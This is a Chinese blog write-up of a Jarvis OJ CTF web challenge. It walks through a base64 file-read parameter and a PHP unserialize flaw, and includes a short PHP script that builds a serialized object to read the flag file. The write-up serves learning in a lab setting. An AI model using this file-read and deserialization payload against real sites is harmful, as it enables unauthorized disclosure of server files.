Jarvis-神盾局的秘密

最新推荐文章于 2025-01-19 17:44:48 发布

白衣w

最新推荐文章于 2025-01-19 17:44:48 发布

阅读量1.2k

点赞数 2

CC 4.0 BY-SA版权

分类专栏： CTF之Web

本文链接：https://blog.youkuaiyun.com/wyj_1216/article/details/82948886

CTF之Web 专栏收录该内容

33 篇文章

订阅专栏

本文详细解析了神盾局CTF挑战的过程，通过分析网页源代码、利用序列化漏洞，成功获取flag。介绍了从图片编码分析到利用序列化函数进行攻击的全过程。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

神盾局的秘密

时间：2018年10月5日汇报人：王祎洁

题目

http://web.jarvisoj.com:32768/
在这里插入图片描述

题解

打开网页，发现一张图片，查看页面源代码，发现图片是从showing.php中读取的，且img=base64编码
在这里插入图片描述

并将其读入
在这里插入图片描述

发现是图片编码

尝试读取已知showing.php文件
在这里插入图片描述

尝试读取index.php文件
在这里插入图片描述

查看页面源代码后，发现shield.php文件
在这里插入图片描述

读取shield.php文件，发现flag is in pctf.php
在这里插入图片描述

尝试读取pctf.php文件，发现不存在
在这里插入图片描述

重新审计index.php文件的页面源代码，与shield.php页面源代码
在这里插入图片描述

发现参数输入class以及反序列化函数，以及过滤

根据shield.php源代码，编写序列化脚本

<?php
	//flag is in pctf.php
	class Shield {
		public $file;
		function __construct($filename = '') {
			$this -> file = $filename;
		}
		
		function readfile() {
			if (!empty($this->file) && stripos($this->file,'..')===FALSE  
			&& stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
				return @file_get_contents($this->file);
			}
		}
	}
	$x = new Shield('pctf.php');
	echo serialize($x);
?>

发在本地运行，得到class参数的赋值
在这里插入图片描述

地址栏输入后，查看页面源代码，发现flag
在这里插入图片描述

PS：用本地跑pctf.php（序列化脚本），我用的是phpstudy，将写好的脚本放到phpstudy的www文件下，之后本地访问：127.0.0.1/pctf.php即可
另外，hackbar是个好东西?
关于序列化函数：serialize( )
https://www.w3cschool.cn/php/php-serialize_info.html